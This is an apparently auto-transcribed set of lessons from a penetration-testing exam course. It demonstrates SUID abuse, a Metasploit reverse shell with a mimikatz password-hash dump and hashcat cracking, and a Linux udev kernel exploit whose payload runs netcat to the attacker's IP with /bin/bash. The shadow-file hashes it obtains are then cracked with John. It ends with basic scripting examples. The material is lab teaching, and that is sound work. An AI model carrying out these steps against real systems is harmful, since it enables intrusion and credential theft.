the other three bits group the other three bits others so we can see here that the s u i d d s i d bit is enabled for the owner therefore it's the s u ID if it was shown here then we'd see the sgib ID bit okay now what is going on here the difference between having the suid and using sudo is that when I configure sudo I'm saying Hey I want this user or these users or these groups to execute that tool as this specific user or that specific user when I enabled the

suid I'm saying that anyone anyone will execute that command in this case it could also be a and script but any user will be allowed to execute it and it will be executed as the owner of that file so first of all when you use sudo you are specifying the users that will be allowed to execute it suid it doesn't end user can also when you use sudo you're saying hey if these users invoke this command this is the user that will actually execute that tool and when I have the suid bit it will necessarily

be executed by the owner which is described right here so what's going on going on here when I say that the pass WD command has the sui debit enabled I'm saying that any user can execute this tool and it will be execute as root there is a very reasonable explain or explanation to this for example the Kali Linux user reaches which is a regular user should be allowed to change his or her own password however to change its password this user must be allowed to edit the slash Etc Shadow file because that's what redefining a

password does it changes that record that in for that data that is stored in the shadow database okay the problem the problem with this is that I am actually allowing a user to execute a tool usually as the root user so let's take a look at an example right here okay so first of all let's see where VI is it's it it's at USR Bean VI but that is actually a link to slash UTC slash Alternatives slash VI which is also another link that points to USR Bean VI M Vim basic there it is okay

as we can see there is no suid enabled here so here's what I'm going to do so if the suid bit is not enabled if I as the Kali Linux user try to edit The Shadow file permission denied I can't even see the content not to mention override it okay um now I am going and I am just assuming that I can execute a 2 here as the administrator user just for presentation purposes I'm going to change chmod change mode I will add the suid permission to slash USR slash bin slash Vim basic so let's

take a look at the permission there once again and we can see that it's changed color and we can also see the suid bit permission over there I am going to once again Ask Cali user I am going to edit that same file and voila I can see the content of the Shadow file as I mentioned the password which is from here all the way to here is hashed but there are plenty of softwares that once you get a hold of this information here these softwares can crack that password and we are actually going to

see that happening I could also delete this information right here like that and although the system tells me hey you don't have any permission to save this file I'd actually do because I'm rude so I can basically do anything if I force I am not going to do this well let me so let me do it again and change this one and I think that I deleted more than I was supposed to I know I think I did now that's that's fine I think that's okay so there let me edit again and we can see

that it's empty now well yeah actually I deleted yeah so you see it says no you can't but well I actually can there it is because I'm the administrator I can do whatever I want so you as a pen tester why is this information so important to you well obviously because if you find a comment that has the Su ID bit enabled you have to see whether that is actually two that is supposed to have the suid enabled or not because if it's not supposed to then that means that you could leverage and you could

try to find a gang privilege for example or edit files or change files or change a service whatever it is based on that okay that's really nice however you have to be able to find those files and one tool that can help you big time to find it actually very easily and quickly is defined command so find people usually no find because of its numerous resources numerous combination of search parameters you can search for well basically you can do perform a search saying hey I want to find all files with the dot txt extension for

example but you can also search for based on a search for files based on permission based on who created that file based on dates when this file has been changed or created or accessed based on size so that there is a bunch of combinations that you can do in order with find in order to find a file and in this case what we are going to do is we are going to find four files in the entire system so starting that that search in the root directory the slash directory and I'm not going to find

files based on name but I'm going to find files based on permissions and what is the permission that I want I want at least so that's why I'm going to use a minus sign here at least four zero zero zero you already know that these three digits here represents that they represent the the first one permission for honor the second second one permission for group and the third one provision for uh uh others now that is if we only considered three digits however we actually have four digits four octode digits for permissions we can omit

the most significant one because these are special bits if I want to specify I can now four number four represents the suid number two represents sgid and number one represents the sticky bit so if I want to search for files that have suid sgid and they stick a bit enabled I should search for seven zero zero zero but that's not what I want I want to find files which have permission at least with at least the suid enabled now look if I have a file that has suid and sgid enabled that's going to be number

six and six is greater than four and what I'm saying here is at least four which means that higher than 4 will also be found and uh shown okay so that would be a basic search however I am a regular user and I'm gonna see a bunch of output that I don't want to see okay you don't have the permission to search in that directory that's perfectly fine so I'm gonna go back and do it again I'm gonna paint the two redirecting to slash Dev slash no okay so error messages should be discharged okay so

it's searching for those files and there it is a bunch of files actually have and look what we have here because I forgot to remove it right um so all these files they have the suid at least the suid permission enabled how can I verify if that is actually what I need so find also has the dash exact option that will allows allow us to execute a another command on top of each file that is found so I want that for each file that is found I want to execute LS space Dash L and the

brackets is used to act to this is going to be replaced by the file name that's been found and that's the end of my exact command so I'm performing that search again and there it is we can see that all these files they have the s uid permission at least the suid permission enabled okay this one has suid and sgid that's perfectly fine what matters to me is this so that is one way of finding those files so in this video we saw we actually understood how critical suid sgid and sticky bits are and we

also saw how we can actually find these types of files so that we can S Pen testers we can leverage those misconfigurations and try together more information I hope you enjoyed this video thank you very much hello welcome to our second video of module 10. and continue continuing what we started in our first video exploiting hosts we're going now we're going to focus on Windows hosts and the reason is because the reason for that is because most of the desktops environment are running Windows that is actually the ultimate goal of attackers of hackers because most

of the desktops are running Windows operating systems and there are different flavors and versions so what we are going to see in this video we are actually going to see two different types of attacks one is how to capture a hashed a a file with hashed passwords which we're not going to see as a file but that's exactly what it is it's the same file that that contains the network land manager files that are the ntlm files you stored by most Microsoft environments that is going to be one and we will also see how to

crack those hashes the other one is going to see going to learn how to actually exploit the Windows system when you have access to that system the other one is going to be a direct and a lot simpler way of gaining privilege so at the end what we're trying to do here today what we are going to try to do is to escalate privileges that's our ultimate goal the difference is we are going to see two different ways of doing it the first one is going to be a lot more Technical and it will give

you a range of possibilities in regards to the number of users that you can retrieve passwords the other one is simply become the administrator by exploiting the operating system itself and not a database or a lack of uh or a misconfiguration anything like that it's just an operating operating system that hasn't been patched updated as it's supposed to be and then you can become the the administrator just by knowing that okay so the first one is in order to do this we need the marisploit framework and this is a framework that we've seen in uh

one of our previous videos and we're actually going to use this same type of attack which is the reverse shell or the reverse TCP attack okay so first of all what I need to to do is to make sure that I know my um Target IP address in my IP address as well so you can see that my Kali Linux which is my attacker machine has IP address 192 168.0.2 in my Windows machine has IP address 192.168.0.22 and this is the very exploitable three virtual machine the one that runs Windows 2008 server the Windows 2008

server okay going back here to my Kali Linux machine now what I'm going to do is I'm going to run my metisploit framework but before we do that you should confirm whether you have a software installed in your in your Cali system called mimikats okay so I have it installed here in case you don't make sure you install it before loading msf console before loading the Metasploit framework by doing pseudo apt to get install media cats Mimi cats like that okay I already have it so what I'm going to do now is run the msf

console and we've done it in the past in a previous video in another video but let's understand it again let's see what is gonna happen here and what we're going to do is to use the reverse shell attack perform the reverse shell attack or the reverse TCP attack what is how does this type of attack work basically what you're gonna do here is you have to find a way of sending a payload to your target once you're capable of sending that payload to that Target you're going to create a reverse connection you're going to force

that Target to connect to your machine and then when you execute a command that command is going to be sent to that machine also you're gonna do that by because you'll also become the administrator in that Target machine now the way that we're going to do this is because in my Microsoft Windows 2008 server we have a central management software with a specific vulnerability that we were able to find by using the nasus scanning tool the NASA's vulnerability scanner tool Okay so what am I going to do here since I already have maybe cats installed

I am going to search for an author oops author called sinner like that now this guy here sinner created many many modules many many exploits for the Metasploit framework the one that I'm looking for is if I'm not mistaken this one 214 exactly so there it is this is an exploit that will exploit a flaw that exists in the manage engine Central Tool for versions 9 and below which is the case I'm not gonna go back to it because we did it in a previous video but we saw that we can simply run a n

scan and see that there there is this flaw in this um in this virtual machine in this Windows 2008 server virtual machine so what I'm going to do now is say hey I want to use the exploit 214. I could also say use slash exploit slash Windows slash HTTP slash manage engine underscore connection ID underscore right well obviously I don't have to because I can simply use the number according to the search that I performed okay what do I have to do now I have to look at the options that I have available in order

to know the options that I actually need to provide the information that I need to provide provide so first of all proxies is not required however our hosts which stands for remote hosts that is required that's because this is my target that's the variable that will identify my target so I am going to set our hosts to 192.168.0.22 another one that is also required is the remote Port however the default remote Port that I have here is the actual def Port that I want to attack that it's the that's the part that is running and

listening to connections according to the server Port 80 uh not server service part 80 20. okay so I don't have to change that also I have to confirm uh my local information are they correct so my Local Host L host is 192.168.020 yep that's correct what is the local part that I want to listen to that's perfectly fine I'm gonna use four four four four four which is the default port for the uh reverse TCP or reverse shell attack and as we can see here this is an exploit that is targeting the manage engine desktop

central 9 or lower on Windows okay once I have that all that I need to do is exploit and we can see that there is one session open right here very good so that connection has been opened my machine is connecting to that guy over here now I am going to say that I want to load mimikats because for a very specific reason now first of all what is mimikatz meme cats is another framework that has a bunch of tools a bunch of resources that will help us crack Windows passwords so it's a a tool

that helps us crack hashes and passwords for Windows systems it's focused on Windows passwords all different types of hashes but all of them for Windows so mimikats have it has several tools to help us with that and what I'm I'm willing to do is to crack a ntlm hash password that we it will also help us see so it will show us the hashes and I could also use mimikats to try to crack those hashes although we're gonna do it a little bit different we're going to use mimikats to see the hashes but we're going

to use a different tool called hashcat in order to try to crack those hashes now something that is very important to mention here is that there is an internal tool in Windows environment called PS exact that it allows us to inform hashes when performing the Authentication that means that once I use mimikats and we're gonna see how we can do that once we use mimikatz to see the hashes I could use that hash along with the PSS internal tool to perform the authentication that I want to perform I wouldn't even have to crack that hash

I wouldn't have to crack the password in order to authenticate in the system that I'm willing to authenticate however this is not our goal we want to see the password indeed for one very specific reason whenever you have a password that is um used by the in a Windows environment for example in a Windows domain there is a very high probability that is also the password that same user account is using for other systems and services so if you can get if you can get a hold of the the ntlm hash and you can crack

it you're gonna see the password in plain text which is probably the same password that is being used for other services for example to authenticate when using the internet to read emails and a bunch of other stuff now before we do that we proceed I want to show you the other type of attack so so far we were able to deploy the reverse shell attack successfully as we can see and actually we can um execute sees info for example and it's going to show us that okay so I'm taking control of this machine here which

is my Windows 2008 server right running this operating system um and there is a bunch of other information I can also check the type of um the type of account that I have so I am an admin and I was only able to get become an admin because I oops executed the get system tool the get system 2 will try to allow you to become the administrator even if you are not at least currently so there now I am a an admin user okay so we were able to successfully implement the reverse shell attack I

will go back to it but the goal so far is to then get a hold of the hashed passwords the hashed windows passwords the hashed and tlm passwords and try to crack those hashes but before we go there because the reason why I'm shifting here is because in order to crack that password that those hashes I'll have to leave the the msf console here and while I am in the msf console I want to show you another type of attack or another resource that you have in order to perform another type of attack so at

the beginning of this video I mentioned that we're performing two uh we're we're analyzing two attacks one is cracking the hashes cracking the passwords the other one is exploiting the operating system to gain privilege to escalate privilege and become the administrator now this is called a kernel exploit and kernel exploits exist for every operating system obviously it exists for all Windows systems as well and this is not a different one so how can you perform this type of attack well basically you have to search for the exploit according to the vulnerability that this kernel this

operating system gives you and how can you find that type of vulnerability well demerisploit um framework along with mimikatz has a tool here that will very simply show you what to do so basically what I'm going to do here is run post slash Windows slash gather slash enum patches and there it is what does it tell me it tells me that the patch kb976902 which is a critical patch has not been applied what to do then I can simply go to for example exploit Dash DB and search for kb976902 what am I going to find

you're gonna see a page with explaining everything about this vulnerability and you also see the exploit file that you can simply download and run in order to exit to exploit this flaw so the good thing about kernel exploits is that most of them are very simple to exploit basically you simply have to download the file most of the times you have to download the files in some situations you have to adjust a few metrics adjust a few variables and once you execute it you escalate privilege usually becoming the administrator and this is not a different

one okay now going back to our first type of attack cracking hashes well first we have to see the hashes so now that we loaded mimicats I am going to use the command mini cats underscore command Dash f space Sam dump column column hashes and what is it going to do it's going to go to the database of hashes you have to remember at this moment I have full access to this Windows machine I am the administrator I can access any resources and this Sam is the database that stores the hashes the hashed passwords in

this system what I'm doing here is dumping those hashes and there it is oops and I can see here that I have the administrator user and the password hashed password in ntlm is this I also have the guest user which doesn't have a hash empty password I have the user vagrant with this hash I have user Leia with that's that hash Luke Skywalker this one Han Solo this one R2D2 this one so all users all user accounts are listed here with their hashed passwords what do I have to do I have to copy only the

hash or hashes okay I am not going to copy the entire content you can just because it's easier you could simply select from here all the way to the end and then you add it so you copy paste in a file and remove whatever is not a hash such as this you have to make sure that your file only has hashes so what am I going to do now I'm I'm gonna quit quit now I'm not in the um in the mattress Floyd framework anymore okay now I already did that and just to make it

faster let's take a look at the hash dot txt file that I have here so I just copied a few hashes and what I'm going to do is use a tool called hashcat with these parameters first of all hashcat well hash cat supports different hashing algorithms and you have to identify him to tell hashcad hey hashcad this is the algorithm that I have okay the hash algorithm that I have in this file you can simply do hashcat space dash dash help in order to see a help and it will show to you the code for

each each of the hash algorithms I know that ntl Lam is represented by code 1000 so I'm saying that I have this file here called hash Dot txt and the hashes there are in the ntlm format algorithm first of all for the this first time I am not going to use the dash A3 and then I form the database of possible passwords oh hold on I forgot to do the dash a0 here because I want this to be a quick attempt this number here will then identify how much effort hash hashcat is going to put

into trying to crack that password so I just want to do it quickly once it's done if you haven't ever cracked that password in the past it's actually going to show you the past the password that it was able to crack but since as we can see here I did it before that file that hash has been cracked and it's stored in the Pod file the Pod file is in the dash hashcat directory and we have that hash cat pod file in there so I'm gonna do a cat that dot hash cat hash cat slash

hashcad dot pod file and there it is it is these are the passwords that are cracked using hashcad user one that's from uh a another video that we we saw and this is the hash that I have for the admin user which actually means vagrant so the admin user has this password vagrant here how do I know that this is the password for the admin user well because of the hash I do remember that this is the hash that was stored that was shown by the mini cats tool from the msf console for the admin

user for the administrator user now again if you want let's say that you were not able to crack it you could do this this would take a much longer time but it would try to break use more resources in order to crack crack that hash or those hashes so in this video we saw two types of uh privilege escalation you can directly try to do it by identifying kernel vulnerabilities which is called exploiting kernels or kernel exploitation or you can try in a Windows environment you can try to find a vulnerability that would give you

access full access to that machine and once you get that full access you can try to dump the CM database which stores the ntlm hashes representing the passwords you copy those hashes and use hashcat to break that those hashes I hope you enjoyed this video thank you very much hello welcome to our third video of module 10 and in our previous video we saw how to exploit system vulnerabilities or host vulnerabilities for Windows systems now we are going to take a look at a Linux system and in this case we will focus on kernel exploitation

now as previously mentioned as we saw in the previous video the good thing about exploiting kernel vulnerabilities is that you can directly gain access as the administrator without putting too much effort in it because basically what you're doing when you use this when you exploit this type of vulnerability is you found somehow you found a vulnerability in that kernel in the core of that system and by leveraging leveraging that vulnerability you leave that older account that you had that limited account and you become the administrator basically in order to exploit this type of vulnerability you

have to find whether the kernel that the system the target system is running has this type of vulnerability or not and then you have to Simply find the exploit downloaded read the few stuff in order to know to understand how to use that exploit and basically run it now one thing that is very important when it comes to Kernel exploitation most of the times it's assumed that you already have access or although limited access but you somehow have some level of access to that Target machine and that is what we're gonna do here so in

order to perform this type of attack we need a Target Linux machine and the target machine that I am going to use is very exploitable too so the meta exploitable framework or The Meta exploitable virtual machine that we used in previous videos was met explorable 3 with Windows 2008 server The Meta is Portable 2 comes with a Linux a Ubuntu machine with a bunch of vulnerabilities as well now all those vulnerabilities they're not important the only important thing in this case is finding a Linux system with a outdated and outdated kernel and also it's important

to realize that although this seems something very obvious you could think hey Network admins or security analysts they are not going to leave their servers outdated well that's not actually true for Linux servers because Linux is such a reliable and stable operating system that it's kind of the contrary Linux admins they prefer to keep older kernel versions and just update the softwares the services well one of the those reasons is because when a kernel is patched the system must be rebooted and they don't want to reboot the system well for many reasons for example because

if the system is rebooted there's going to be a downtime and Linux servers are deployed in order to reduce downtime preferably not even have a downtime so it's very common to find Linux servers with kernel 2.6 which is what we're gonna see right here Okay so if you want to do the same search for metal exploitable to download it's not a virtualbox machine it's a VMware virtual machine but you can still use virtualbox to to to run this virtual machine okay so here it is I have my medic portable virtual machine right here um and

my user is msf admin this is a regular user that can run all commands using sudo but it's not the admin User it's just a regular user that can invoke sudo to run admin tools Okay so at first I have access to this machine a limited access I have access with a limited user okay now what I need to do is I have to figure out what is the operating system its version and its kernel so the first tool that I can run is LSB underscore release okay if it doesn't say anything I can use

the dash a okay it's a Ubuntu 8.04 yep that's true this is a very old distribution fine but while that doesn't help that much I actually need to see the version of the kernel okay so you can use your name Dash a and here it is it's a 2.6.24-6 dash server what matters is 2.6.24 in this case now how do I figure out if there is a kernel exploit a kernel vulnerability to this uh version to this kernel version okay now I'm gonna go to my attacking machine which is my Kali Linux machine and there

is a tool called called search sploit using search exploit is the same as open in your browser going to or any of those vulnerability search database tools or websites such as the exploit Dash DB website the only difference is you don't have to go online you can perform this search locally and how can you perform this search Okay so the type of vulnerability that I'm trying to find or the exploit that I'm looking for is a privilege escalation vulnerability so I'm gonna search exploit search sploit privilege I have to define the type of exploit that

I'm looking for okay privilege now it's if I only do this it's going to show a bunch of stuff that's not what I want so I'm gonna apply filters first of all I want to find privilege escalation for Linux systems okay now not anything related to Linux systems but associated with the kernel and the specific oops grab kernel and specifically for kernel versions 2.6 there it is I forgot the Dash I okay there is a bunch of vulnerabilities here obviously you'd have to in order to understand well if you don't want to do any deeper

studies you can simply for example okay I'm gonna use this one and you download you go you browse and you try to understand how to you read the documentation in order to understand how to use this exploit I am going to use this one so any of these ones that you see here might work according to your distribution okay so that is very important did the the distribution that I have as a Target is a Ubuntu which means that this one should work and some others here this one is specific for Centos systems but I

am going to try this one okay fine well actually this one would not work because well it could not work because it's not associated with kernel 2.6 this one I am certain that is associated with kernel Linux kernel 2.6 okay that's exactly what I'm looking for and I know that it works against Ubuntu systems oh so that's the one that I'm picking oh I want to try this one um let me go there and it's 2.6.24 this one okay this one would work as well but let's use that other one which is right here now

I can tell you in advance and you'd have to read the documentation and search for it but I can tell you in advance that this is an exploit that leverages a flaw in the udab system so the udep system which is a system in Linux that controls devices and device files and the udap system on kernels 2.6 version 2.6 it allows a remote execution of commands via netlink so netlink is a tool that is a process that can send messages to other processes in the U Dev accepts managing administrator messages sent from the netlink process

so what are we going to do here we are going to use this vulnerability here we're going to exploit this vulnerability here to send administrative commands to my to my target system okay well fine great but to do that I actually need the exploit how can I find that exploit well I know that the file is called let me go back there it's called 8572.c so I am going to locate eight five seven two dot C and there it is so there is the the exploit for it is that USA slash USR is less shares

exploitdb slash exploits slash Linux slash local slash 8572.c now keep in mind I know that I have the exploit here because I use the search sploit Tool The Search sploit tool will only show me exploits or vulnerabilities that it has stored in the hard drive either partition okay so if it found that vulnerability that exploit that means that it exists in the system I search for it and there's the file okay but this is the exploit I need that this exploit in my target machine okay you can simply copy using for example SCP copy it

to the Target machine and we must remember that we're assuming that you somehow have gained access to that version to that other Target machine with a limited user so now you can simply SCP to that Target machine in this case that is not my IP here my my target machines IP address is 192 168 0 22 I'm going to cancel because I already have that file there Okay so remember that my user is msf admin and I'm going to copy it to it to that user's home directory before I go to my target machine and

do what I need to do there I am going to create a socket in my um attacking machine using the netcat commit so netcat command either opens a port opens a connection waiting for clients or it connects to a server using plain text messages there there's no encryption there is no um no presentation going on there is no adaptation there is no formatting whatever is received is the the the set of strings this the array of characters that is being interpreted and executed so in this case I am going to open a connection so I'm

going to listen to Port import four three two one now it's very important to keep this in mind if this is the part that I'm defining I will have to tell the exploit in my target machine that this is the port that the target machine should connect to so the way that this attack will work is we're gonna Leverage a vulnerability in the uwab system of that Target machine that Target machine will receive messages administrative messages from a remote host so what I'm doing here is I'm opening a socket in my attacking machine my Kali

Linux machine then I'm gonna force my target machine to connect to this port and this channel this network channel will be used to send messages from my Kali Linux machine to my target machine using the net link process okay so there it is it's listening on Port four three two one now I'm gonna go to my very exploitable machine and I know that I have my 85 72.c exploit file there what do I do now I simply compile this file to generate a binary that I can execute I am going to compile my my 8572.c

file generating the binary called exploit Dash 8572 after that I have to create any so it will generate this exploit file here make sure that you have um when you compile that file the permission of execution is set as we can see r w x r x r x so X execution is is there in case if it's in case it's not make sure that you give execution permission to that file then I have to create in the TMP directory a file a script file called run and this is how the 8572 exploit works it

will look for this temporary file in this slash TMP directory and what is this script file this is a bash script that will tell the exploit what com command it should execute when being invoked and the command that I wanted to execute is to run netcat NC passing as arguments the attacker machines IP address which is 192.168.0.20 connecting to Port 4321 so that's why you have to keep in mind that whatever is the part number that you defined in your attacker machine that's the same part number that you should specify here and once that connection

is established it should run slash bin slash Bash so it should open a terminal because this is the terminal that will be used to transmit commands this is what will enable the attacker machine to send commands administrative commands to that Target machine okay now just one more step before we exploit We Run The exploit I mentioned that the this udav vulnerability relies on the net link process messaging processes that means that I have to know the PID of my net link of the the target machines net link process which is very simple to retrieve I

simply do cat slash proc slash Nat slash net link and the only PID that you see here with a number different from zero that's the netlink PID in this case it's 2404 okay now I can simply do exploit Dash 8572 space did not link PID 2404 and seems like nothing happened here at least not here however when I go to my Kali Linux machine which is my attacking machine oh look so connect to 192.168.0.20 from 192.168.0.30 okay what if I do ID here that's interesting remember that when this netcat connection channel was established The Bash

shell was created so whatever I type here is being sent to the bash of that Target machine so I can use any terminal any shell command here I used ID and it shows me that I have the root user so there is some quite privileged escalation from a regular user to the administrator in case I'm not certain that this is I am in that machine let's say that I run hostname oh yeah so this is the very exploitable virtual machine nice also what if I do cat slash Etc slash shadow well that's the pal the

database that stores uh the hashed passwords only administrators the root user specifically can read that file so let's take a look at it there you go I can do whatever I want here I could use the pass WD command to Define redefine the password of a user okay so since I am the root user I could do pass WD and then the simply pass WD and redefine the password for the root user in case I actually want to see the password I want to crack the hashed passwords what I could do is copy the content

that I see here or a specific line according to a user and try to crack it using for example John the Reaper so that's what I'm gonna try to do I already have a user here that I copied so let's take a look at that I'm terminating that connection and I have here the md5 dash Shadow Dot txt if we go back here this hash here is the same hash that we have down there right same hash I previously did this just to make it faster okay so I have just one file called md5-shadow.txt with

one single line I could have the entire Shadow file I could have it but just to make it quicker I'm using just one single user and then I'm gonna invoke John the Reaper passing that file and there it is now once it's done I can use the dash dash show option and guess what there is a user with the password msf admin one password hash cracked zero left so that user has that password now I know that the msf admin user has password msf admin John the reaper is a very simple tool you can simply

use it to crack a password there is no mystery there the only catch is that in order to use John the Reaper you have to have the salt the algorithm must be an algorithm that uses a salt and if it is you must have that salt so for example the the msf admin user here has this salt and here is the hash you must have both in order to crack using John the Reaper so in this video we saw how to gain privilege in a Linux system leveraging a kernel exploit as previously mentioned this is

not a difficult task you just have to read the documentation in order well obviously you have to find the exploit once you do it you have to read the documentation in order to see the nuances the options that must be defined before you execute it but when you execute it you instantly get access get administrative access to that Target machine I hope you enjoyed this video thank you very much hello welcome we are now initiating module 11. this is our second last module of the contia pen Test Plus prep exam and the topic in this

module is writing scripts obviously you first need to understand why you must know how to write scripts and then we'll focus on actually writing those scripts first of all the CompTIA fantastic exam expects you to understand scripping because pen testing in general networking admins administration tasks are very Hands-On but at the same time very manual they require a deep interaction from you as an admin or as in pen tester that is why you need to automate many of your tasks and there is nothing better than scripts to help you automate your daily tasks so they

want you to understand scripting so that you can write scripts that will automate whatever you're willing to do so for example for a pen tester there is a bunch of steps that you need to execute in a bunch of tools that you need to run in a short period of time you first for example you need to gather information you need to scan IPS is scan Boards of different hosts different Networks it would consume too much time if you were to scan a specific IP address and then analyze the output then you scan another IP

address and you read the output so you can write scripts to shoot those those Port scans even to collect the output and filter that output sent to you by email something that that's been already filtered and you can only see results that are actually helpful for you so that is why we need to understand scripting and also be able to write Scripts now the CompTIA fantastic exam expect you to learn to know at least a handful of languages we are going to cover fully cover bash scripting but we are also going to understand how to

write Scripts in Powershell which is the scripting language that we have in Windows systems we're gonna learn we're gonna focus on bash but we're also going to cover the structure of Ruby and python now what is the difference between these languages we're gonna talk about that as we cover though this these scripts in each of those languages so to start off let's start off with a very basic shell scripting bash script which is the hello world script I have all these scripts that we're gonna cover here and let's start with Hello dot sh and this

is the content whenever you write a bash script each type of script must have an extension although it doesn't change anything there is no such thing as extensions in the Linux environment however you should write those extensions you you should create a file name with an extension so that other people can know and even yourself can know what type of content there is in that script what is the language you used in that script so when I take a look at all these hello scripts here I can see that the last one has the dot

sh extension that means that this is a bash script this one has the extension RB that means it's it's been written in Ruby and this one is p y python we're also going to see that extensions in Powershell are PS1 okay so let's start with this one in Linux environments the first line of and you can use any editor any text editor to create your script usually I use VI if you prefer to use Nano that's perfectly fine any emacs that's perfectly fine you just have to make sure that you you can you have that

tax editor with you and you can work around it and you can work with that script with that editor so the first line will have The Interpreter of that script now you can create Scripts using a compiling language a compiled language and what is that any type of language can be written using a compiler or an interpreter the difference is when you use a compiled language such as Java CNC what is going to happen is once you are done writing the source code you have to compile that source code to generate a binary file for

example an executable file when you compile that that source code the compiler will verify the source to see if there isn't any syntax errors if there is it's gonna tell you hey there is an error here you have to fix it once you fix it I'll be able to compile and generate the binary file when you have a interpreted language that's not happened that's not happening you don't have the compiler which means that The Interpreter will read the source code during the execution time when you execute that file that's when the com The Interpreter is

going to read a niche line that is read is going to be executed so in this case we're using we're only going to use interpreted languages so in this case The Interpreter is going to read the first line pound exclamation point slash being slash bash whenever The Interpreter says pound exclamation point it knows that whatever comes after that is the is The Interpreter that is the tool that will interpret the rest of the code then it goes to the second line which says Echo hello world echo in bash this is the tool that will simply

output display print the text that comes the string that comes after Echo so and there then there is nothing else but if I had another line after Echo hello world let's say date the comment date it would execute first hello world and if it works if the the syntax is correct it's going to print hello world then it would go to the next line date which is a command to print the current date it would print the current date so it executes each line before going to the next one when you're using trip interpreted language

The Interpreter doesn't analyze the content the entire content so let's say that you have an error in your Fifth Line and you have a code of 10 lines it would execute the first the second the third the fourth when it reaches the Fifth Line it will return an error now depending on how you created that script you could exit right there or it can just continue if the following lines lines from 6 to 10 are do not depend on line five then it will just generate an error on line five and continue executing line six

seven eight nine ten okay another very important detail here when you create a text file that text file won't have permission of execution as we can see here by the caller it's in white I can tell that there is no permission of execution and we can confirm this by doing this there no execution you have two ways of executing a script the first one is you specify The Interpreter and then the script name okay there's the result it simply shows hello world or you can give permission of execution to that file to that script and

do dot slash the file name and there is this same result now this is a script that was written in bash script or shell script let's take a look at another one now let's take a look at a ruby the same script but written in Ruby and that is the extension RB so the same idea first line you have The Interpreter Ruby is on the slash USR slash Bean slash Ruby when you have you have um echo in a bash language to print a content in Ruby it's puts so puts hello world let's execute this

and is this gonna work no permission denied because I'm trying to execute a file that is not executable so I am going to do CH mode U plus X to give permission of execution to hello.rb now let me try to run it again and there you have it the same result so observe that we have some differences among languages now let's take a look at hello Dot p y first line same thing obviously you have a different interpreter but the way that we print is different it's not Echo it's not puts but it's print observe

that you have to use parentheses some languages also require the semicolon at the end of the of each line this is not the case so let me give permission of execution to hello.py and let me run it here there you go same output so it's very important that you understand at least the basics of these four languages Ruby python bash and Powershell let's say that you have to pick two of those for some reason you won't be able to cover all those four languages you have to pick two the ones that you should tackle are

going to be bash and Powershell at least for the CompTIA pentas plus exam however I strongly recommend that you learn all these four these four are covered by the CompTIA pentasplus exam okay what about Powershell so Powershell is the scripting language for a Windows environment so let's take a look at it now I am at the at my very exploitable 3 virtual machine with a Windows 2008 server and the first thing that you need to do is go to the start board button and type Powershell there it is you go there you open it and

this is your Powershell prompt now just like in the Linux environment you have to pick the text editor that you're gonna use in a Windows environment I like to use notepad so here we have the we can see the three scripts that I created in Powershell okay you create that script and then you go back to your Powershell prompt let's take a look at the content here first the con content of hello.ps one now in a Powershell script you don't have to Define The Interpreter because you are already in the Powershell environment you just go

straight to the code and we have echo in bash we have puts in Ruby we have print in Python we have write Dash host in Powershell how do I run it Dot backslash and the script name there you have it same idea okay now let's improve it a little bit this is the very basic script that you can ever write it's a hello world script what if I want to perform some math computation some math calculation we have here the math.ps1 and there's the content so first thing the idea of variables a variable is something

that you create in order to store values it can be a string it can be a number but you have to create that space in memory and that spacing memory is identified by what what we call a variable so here I am creating a a variable named value and the content is 20. then I create another variable called final value the reason is I want to assign a new value based on the content of the first variable so final value will receive a Content based on the value of the value variable and I am dividing

value by two so you can see the slash there that's the symbol to perform a division so I'm dividing 20 by 2. now the result of that computation is going to be stored in final value this new variable called final value and then I print the content of final value let's see if that is going to work there there's my result now what about our other languages let me go back here to my Kali Linux machine and the same content the same script has been written here in Bash in Ruby let's take a look at

my math dot sh script there so a difference that we have in bash scripting a few differences actually first of all when I create a variable when I assign value to a variable I do not use the dollar sign when I'm assigning values to variables in bash I do not use the dollar sign I only use the dollar sign when I'm invoking the content of that variable so I'm assigning 20 to Value here now in Powershell we saw that I had to create another variable receiving that computation so I had to create final value that

would receive 20 or value divided by 2. in bash you don't have to assign that to a variable you can directly print the computation the formula that you have but something interesting here whenever you're dealing with math computation in bash you have to use dollar sign two parenthesis and then the math the formula that you need and you close those two parentheses the same way I use slash to perform that division okay so I'm directly doing that also observe that here I'm invoking the content of value therefore I use the dollar sign let me run

it there same result okay now we have to move forward and see some other examples some are complex examples and one thing that is very useful is arrays we have to know how to implement end user arrays so let's first take a look at the array.sh script in bash the way that I create an array is parenthesis between parenthesis I specify the values that I want to assign to that array separated by spaces so I'm creating a an array variable here called array and this is the content the First Position will have value 10 the

second position 20 then 30 40 so forth so on when I want to invoke the value of a specific position then I use the dollar sign the variable name and between brackets the number of the position that I want to find to retrieve within that array so in this case let's assume that I want to retrieve the value of and we have to keep in mind that it that arrays they start counting from zero this is position zero one two three four five so in this case when I do Echo dollar sign array five I'm

actually accessing this sixth position not the fifth so let's run it I think I don't have permission so CH mode U plus X array.sh there you go we accessed the sixth position let's see how we do the same code in Powershell and I have here the array dot PS1 let's look at its content so instead of using spaces as we can see here in Bash in Powershell we use comma so 10 comma 20 comma 30 comma 40 comma 50 so forth so on and there is no parenthesis just the value separated by comma now very

similarly I use dollar sign array between brackets 5. and then let's try there same output same result now let's start focusing more on bash scripting we took a brief look at some of the differences at least a few of the differences between some languages it's very difficult to learn at the same time two three four different languages we have to focus on one but you do have to be aware that there are differences and you have for the CompTIA pentas plus exam you have to know at least those four you can you have to be

able to at least identify because what's going to happen is you won't have to create a code a code will be presented to you you do have to understand that code you do have to be able to identify for example is this code has this code been written in Python in Ruby in Powershell because the answer will very much likely be related be associated with that language okay so now let's focus on bash and see some other stuff that we may find and we may use two things that we have to be aware of how

to use conditions how to create conditions and how to create comparisons so at first let's take a look at the comparison.sh code there this is a simple script in which it will detect the current hour it doesn't matter the minutes just the the hour so let's say that right now the hour is six that's the hour six so we don't see the minutes so let me go back to the script there it is it's gonna search for the current hour by entering by executing the command date plus percentage a capital h now observe first each

language has its own way of dealing with it in bash when you want to execute a command and capture the result the output of that command and store it in a variable you put it between back quotes as you can see okay so what is this script going to do it's going to look for the current hour and according to that value it will present a message so the idea is if it's between midnight and 6 am it will show you should been bad if it's between 6 AM and 12 am well actually if it's

lower than 12 it's going to show good morning if it's lower than 18 it's going to show good afternoon if it's lower than 23 it's going to show good evening now first of all observe that if it's lower than 23 it will cover from zero hour and zero minutes up to 23 hours and 59 minutes when I say lower than 18 it covers from zero which is midnight and 0 minutes until 1859 same thing for 12 from 0 to 12 59 and actually I should fix this because it should be 11 59 and 1759. but

